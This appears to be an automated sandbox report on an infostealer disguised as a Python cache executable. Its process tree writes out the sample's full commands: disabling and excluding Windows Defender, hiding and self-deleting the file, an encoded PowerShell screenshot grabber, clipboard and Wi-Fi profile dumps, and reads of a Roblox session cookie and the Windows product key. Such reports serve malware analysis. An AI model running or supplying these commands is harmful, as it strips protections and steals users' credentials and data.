Analysis

  • max time kernel
    92s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 10:29

General

  • Target

    danger-multi-tool-main/src/utils/__pycache__/cpython-311.exe

  • Size

    7.4MB

  • MD5

    1a2ff293768d10b8c99d3cd2950164b9

  • SHA1

    e9123a3d2a53b5f8d008db9608037dd0571f3cae

  • SHA256

    3c09a37412bf3981e5d678b6598c2cdad32fcd6761fc649a50693ba45746e242

  • SHA512

    ff8a853675431bc36d88288546d7f467f239ae2e4e7ef019476ac4ca06f715e88f201753d7201dbfacb3b6dca51be764036372de8a8c0def29e00ae5e9469941

  • SSDEEP

    98304:FWeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTfHfyk6LK4dSI23o7yc:FPYmOshoKMuIkhVastRL5Di3tO/ys42O

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe
    "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5056
    • C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe
      "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2868
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4984
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe"
          4⤵
          • Views/modifies file attributes
          PID:4280
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‏​ .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3380
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‏​ .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4144
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3152
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2968
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3908
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:772
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:2900
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4836
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1912
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4880
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3836
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2068
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yvutqykg\yvutqykg.cmdline"
              5⤵
                PID:1076
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA865.tmp" "c:\Users\Admin\AppData\Local\Temp\yvutqykg\CSC3113C4BC17342E3B7F5AC8644D4A7CF.TMP"
                  6⤵
                    PID:760
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2336
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4936
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3096
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:736
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3832
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4884
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2228
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:3112
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:5020
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:3428
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:3004
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2964
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:2380
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:832
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:1548
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:4476
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\UfneJ.zip" *"
                                      3⤵
                                        PID:2948
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\UfneJ.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5104
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:3940
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3656
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:3380
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:3488
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:1756
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:2972
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:2544
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3948
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:4720
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:4976
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:4512
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2096
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe""
                                                        3⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        PID:3412
                                                        • C:\Windows\system32\PING.EXE
                                                          ping localhost -n 3
                                                          4⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:4952
                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    1⤵
                                                      PID:4936

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

